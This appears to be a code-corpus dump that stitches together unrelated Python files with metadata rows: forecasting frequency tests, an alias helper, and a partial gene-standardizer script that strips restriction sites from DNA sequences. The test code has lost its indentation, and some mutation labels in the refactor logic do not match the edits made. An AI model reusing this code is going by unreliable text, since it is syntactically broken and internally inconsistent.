quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-16 00:00:00")
def test_day_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-15 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "3D"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-18")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-21")
def test_business_day_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-14 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "B"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-15")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-18")
def test_week_sunday_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-17 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "W-SUN"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-24")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-01-31")
def test_week_tuesday_frequency():
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-19 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "W-TUE"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-01-26")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-02-02")
def test_month_frequency():
"""This test covers all month frequencies (quarter=3M, semester=6M, year=12M)"""
prediction_length = 1
timeseries = {
TIMESERIES_KEYS.START: "2021-01-31 00:00:00",
TIMESERIES_KEYS.TARGET: np.array([12, 13]),
TIMESERIES_KEYS.TARGET_NAME: "target",
TIMESERIES_KEYS.TIME_COLUMN_NAME: "date",
}
frequency = "4M"
gluon_dataset = ListDataset([timeseries], freq=frequency)
model = Model(
"simplefeedforward",
model_parameters={"activated": True, "kwargs": {}},
frequency=frequency,
prediction_length=prediction_length,
epoch=1,
batch_size=8,
num_batches_per_epoch=5,
)
evaluation_forecasts_df = model.train_evaluate(gluon_dataset, gluon_dataset, make_forecasts=True, retrain=True)[1]
assert evaluation_forecasts_df["index"].iloc[0] == pd.Timestamp("2021-05-31")
trained_model = TrainedModel(
gluon_dataset=gluon_dataset,
prediction_length=prediction_length,
frequency=frequency,
quantiles=[0.5],
include_history=True,
)
forecasts_df = trained_model.predict(model_label="FeedForward", predictor=model.predictor)
forecasts_df = trained_model.get_forecasts_df_for_display(forecasts_df, session="2021-01-01")
assert forecasts_df["date"].iloc[0] == pd.Timestamp("2021-09-30")
| 38.45935 | 118 | 0.688722 | 1,119 | 9,461 | 5.546917 | 0.103664 | 0.086837 | 0.056388 | 0.072177 | 0.932657 | 0.932657 | 0.924601 | 0.923957 | 0.92299 | 0.90559 | 0 | 0.051221 | 0.195222 | 9,461 | 245 | 119 | 38.616327 | 0.763987 | 0.007822 | 0 | 0.721973 | 0 | 0 | 0.08901 | 0 | 0 | 0 | 0 | 0 | 0.06278 | 1 | 0.03139 | false | 0 | 0.026906 | 0 | 0.058296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
115e62b5047c98cd670be780eb9b04d76ffe5bc3 | 124 | py | Python | dodo_commands/framework/get_aliases.py | mnieber/dodo-commands | 82330006af2c6739b030ce932ba1ff9078b241ee | [
"MIT"
] | 8 | 2016-12-01T16:45:45.000Z | 2020-05-05T20:56:57.000Z | dodo_commands/framework/get_aliases.py | mnieber/dodo-commands | 82330006af2c6739b030ce932ba1ff9078b241ee | [
"MIT"
] | 75 | 2017-01-29T19:25:45.000Z | 2020-01-28T09:40:47.000Z | dodo_commands/framework/get_aliases.py | mnieber/dodo-commands | 82330006af2c6739b030ce932ba1ff9078b241ee | [
"MIT"
] | 2 | 2017-06-01T09:55:20.000Z | 2017-06-08T14:45:08.000Z | from dodo_commands.framework import ramda as R
def get_aliases(layer):
return R.path_or({}, "ROOT", "aliases")(layer)
| 20.666667 | 50 | 0.717742 | 19 | 124 | 4.526316 | 0.842105 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145161 | 124 | 5 | 51 | 24.8 | 0.811321 | 0 | 0 | 0 | 0 | 0 | 0.08871 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
fec290a751966f68364cc8934df8c972477d9f8d | 31,272 | py | Python | WEB/cgi-bin/genestand.py | openbioeconomy/SynBioStandardizer | 8eb7c60a01c898a8220184126903652c509961cb | [
"BSD-2-Clause"
] | null | null | null | WEB/cgi-bin/genestand.py | openbioeconomy/SynBioStandardizer | 8eb7c60a01c898a8220184126903652c509961cb | [
"BSD-2-Clause"
] | 1 | 2015-07-19T12:54:10.000Z | 2017-11-19T20:34:59.000Z | WEB/cgi-bin/genestand.py | openbioeconomy/SynBioStandardizer | 8eb7c60a01c898a8220184126903652c509961cb | [
"BSD-2-Clause"
] | 1 | 2018-08-31T08:07:56.000Z | 2018-08-31T08:07:56.000Z | #####
#
# Synthetic Biology Gene Standardizer
# Copyright (c) 2015, Tyson R. Shepherd, PhD
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors.
#
#####
import sys
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
from Bio.Restriction import *
from math import *
#
# Meat and potatoes
#
def refactor( outSeq, recSeq, changes, stnds ):
"Refactor sequences: outSeq is output sequence, record is input, changes is mutations"
outSeq.seq = outSeq.seq.upper()
recSeq.seq = recSeq.seq.upper()
m = 1
while m == 1:
m = 0
if str(outSeq.seq[0:3]) != 'ATG':
A = 'Start Codon: '+str(outSeq.seq[0:3])+'1'+'ATG'
changes.append(A)
outSeq.seq='ATG'+outSeq.seq[3:]
recSeq.seq='ATG'+recSeq.seq[3:]
if 'N' in stnds:
ndeInst = NdeI.search(outSeq.seq)
for i in ndeInst:
m = 1
j = (i - 3) % 3
k = i - 2
if j == 0:
k = k + 2
A = "NdeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC"):
A = "NdeI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
changes.append(A)
A = "NdeI: A"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A" or stK == "G"):
A = "NdeI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "T":
A = "NdeI: TCA"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "NdeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
if 'BglB' in stnds:
xhoInst = XhoI.search(outSeq.seq)
for i in xhoInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "XhoI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
stJ = str(outSeq.seq[k+2])
if (stJ == "A" or stJ == "G"):
A = "XhoI: AG"+stJ+str(k+1)+"CGC"
outSeq.seq = outSeq.seq[:k]+"CGC"+outSeq.seq[k+3:]
elif (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "XhoI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "XhoI: TCG"+str(k-2)+"AGC"
outSeq.seq = outSeq.seq[:k-3]+"AGC"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C":
A = "XhoI: T"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
changes.append(A)
A = "XhoI: A"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
if (('BioB' in stnds) or ('BglB' in stnds)):
ecoInst = EcoRI.search(outSeq.seq)
for i in ecoInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "EcoRI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "EcoRI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GA":
A = "EcoRI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "EcoRI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "EcoRI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "EcoRI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "EcoRI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK == "A":
A = "EcoRI: "+stK+"GA"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "G":
A = "EcoRI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "T":
A = "EcoRI: G"+str(k-4)+"A"
outSeq.seq = outSeq.seq[:k-6]+"TAA"+outSeq.seq[k-3:]
else:
A = "EcoRI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
if 'BioB' in stnds:
xbaInst = XbaI.search(outSeq.seq)
for i in xbaInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 3
A = "XbaI: AGA"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
elif j == 2:
k = k + 3
A = "XbaI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "XbaI: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
speInst = SpeI.search(outSeq.seq)
for i in speInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "SpeI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
A = "SpeI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "SpeI: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
pstInst = PstI.search(outSeq.seq)
for i in pstInst:
m = 1
j = (i - 6) % 3
k = i - 5
if j == 0:
k = k + 5
stK = str(outSeq.seq[k-1:k+5])
if (stK == "GGATCT" or stK == "GTGCAT"):
A = "PstI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
else:
A = "PstI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
stJ = str(outSeq.seq[k-8:k-4])
if stJ == "GAAT" or stJ == "AAAT":
A = "PstI: C"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC":
A = "PstI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "AG" or stK=="AC" or stK=="CA":
A = "PstI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
else:
A = "PstI: C"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if stK == "C" or stK=="G":
A = "PstI: T"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
else:
A = "PstI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
mfeInst = MfeI.search(outSeq.seq)
for i in mfeInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 3
A = "MfeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "CT" or stK == "CC" or stK == "GT" or stK == "GC"):
A = "MfeI: C"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif (stK == "AG" or stK == "AC" or stK == "CA"):
A = "MfeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
else:
A = "MfeI: C"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A" or stK == "G"):
A = "MfeI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "T":
A = "MfeI: TCA"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "MfeI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
avrInst = AvrII.search(outSeq.seq)
for i in avrInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 3
A = "AvrII: AGG"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
elif j == 2:
k = k + 3
A = "AvrII: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "AvrII: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
nheInst = NheI.search(outSeq.seq)
for i in nheInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "NheI: T"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
A = "NheI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "NheI: G"+str(k)+"A"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
nsiInst = NsiI.search(outSeq.seq)
for i in nsiInst:
m = 1
j = (i - 6) % 3
k = i - 5
if j == 0:
k = k + 5
A = "NsiI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK=="CA" or stK=="GC" or stK=="CT" or stK=="CC" or stK=="AC"):
A = "NsiI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "GT":
A = "NsiI: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif (stK == "AT" or stK == "CG"):
A = "NsiI: A"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif (stK == "GG"):
A = "NsiI: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "NsiI: AGA"+str(k-3)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "TT":
A = "NsiI: TTA"+str(k-3)+"CTG"
outSeq.seq = outSeq.seq[:k-6]+"CTG"+outSeq.seq[k-3:]
elif stK == "TC":
A = "NsiI: TCA"+str(k-3)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "NsiI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k+1:k+3])
if (stK == "TA" or stK == "TG"):
A = "NsiI: T"+stK+str(k+1)+"CTG"
outSeq.seq = outSeq.seq[:k]+"CTG"+outSeq.seq[k+3:]
else:
A = "NsiI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
changes.append(A)
if 'BglB' in stnds:
bglInst = BglII.search(outSeq.seq)
for i in bglInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 0
A = "BglII: AGA"+str(k)+"CGT"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK=="CA" or stK=="GC" or stK=="CT" or stK=="CC" or stK=="AC"):
A = "BglII: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif stK == "GT":
A = "BglII: A"+str(k-3)+"G"
outSeq.seq = outSeq.seq[:k-4]+"G"+outSeq.seq[k-3:]
elif (stK == "AT" or stK == "CG"):
A = "BglII: A"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif (stK == "GG"):
A = "BglII: A"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BglII: AGA"+str(k-3)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK == "TT":
A = "BglII: TTA"+str(k-3)+"CTG"
outSeq.seq = outSeq.seq[:k-6]+"CTG"+outSeq.seq[k-3:]
elif stK == "TC":
A = "BglII: TCA"+str(k-3)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
else:
A = "BglII: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k+1:k+3])
if (stK == "TA" or stK == "TG"):
A = "BglII: T"+stK+str(k+1)+"CTG"
outSeq.seq = outSeq.seq[:k]+"CTG"+outSeq.seq[k+3:]
else:
A = "BglII: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
bamInst = BamHI.search(outSeq.seq)
for i in bamInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "BamHI: A"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "TT" or stK == "TA" or stK == "AA" or stK == "GA"):
A = "BamHI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif (stK == "CG" or stK == "AC" or stK == "GC" or stK == "GG"):
A = "BamHI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "GT":
A = "BamHI: G"+str(k-3)+"T"
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
elif stK == "TC":
A = "BamHI: TCG"+str(k-5)+"AGC"
outSeq.seq = outSeq.seq[:k-6]+"AGC"+outSeq.seq[k-3:]
elif stK == "AG":
A = "BamHI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
else:
A = "BamHI: T"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
stK = str(outSeq.seq[k-6])
if (stK == "C" or stK == "A"):
A = "BamHI: "+stK+"GG"+str(k-5)+"CGT"
outSeq.seq = outSeq.seq[:k-6]+"CGT"+outSeq.seq[k-3:]
elif stK=="G":
A = "BamHI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "BamHI: C"+str(k)+"T"
outSeq.seq = outSeq.seq[:k-1]+"T"+outSeq.seq[k:]
changes.append(A)
if 'BioB' in stnds:
notInst = NotI.search(outSeq.seq)
for i in notInst:
m = 1
j = (i - 3) % 3
k = i - 2
if j == 0:
k = k + 5
A = "NotI: C"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "AA" or stK == "GA"):
A = "NotI: G"+str(k-3)+"A"
outSeq.seq = outSeq.seq[:k-4]+"A"+outSeq.seq[k-3:]
elif stK == "GG":
A = "NotI: G"+str(k-3)+"C"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
elif stK == "AG":
A = "NotI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
elif stK == "CG":
A = "NotI: CGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-4]+"C"+outSeq.seq[k-3:]
else:
A = "NotI: G"+str(k)+"C"
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
changes.append(A)
elif j == 1:
k = k + 4
A = "NotI: C"+str(k-3)+"T"
changes.append(A)
outSeq.seq = outSeq.seq[:k-4]+"T"+outSeq.seq[k-3:]
apoInst = ApoI.search(outSeq.seq)
for i in apoInst:
m = 1
j = (i - 2) % 3
k = i - 1
if j == 0:
k = k + 2
A = "ApoI: A"+str(k)+"G"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
A = "ApoI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
elif j == 1:
k = k + 4
A = "ApoI: T"+str(k)+"C"
changes.append(A)
outSeq.seq = outSeq.seq[:k-1]+"C"+outSeq.seq[k:]
if 'MoClo' in stnds:
bbsInst = outSeq.seq.find("GAAGAC")
if bbsInst > 0:
m = 1
j = bbsInst % 3
k = bbsInst + 1
if j == 0:
k = k + 2
A = "BbsI: A"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if (stK == "AG"):
A = "BbsI: AGG"+str(k-5)+"CGC"
outSeq.seq = outSeq.seq[:k-6]+"CGC"+outSeq.seq[k-3:]
changes.append(A)
A = "BbsI: G"+str(k)+"A"
outSeq.seq = outSeq.seq[:k-1]+"A"+outSeq.seq[k:]
elif j == 1:
k = k + 2
A = "BbsI: AGA"+str(k)+"CGT"
outSeq.seq = outSeq.seq[:k-1]+"CGT"+outSeq.seq[k+2:]
changes.append(A)
bbsInst = 0
bbsInst = outSeq.seq.find("GTCTTC")
if bbsInst > 0:
m = 1
j = bbsInst % 3
k = bbsInst + 1
if j == 0:
k = k + 2
A = "BbsI: C"+str(k)+"G"
outSeq.seq = outSeq.seq[:k-1]+"G"+outSeq.seq[k:]
elif j == 2:
k = k + 3
stK = str(outSeq.seq[k-6:k-4])
if stK == "AA":
A = "BbsI: G"+str(k-3)+"A"
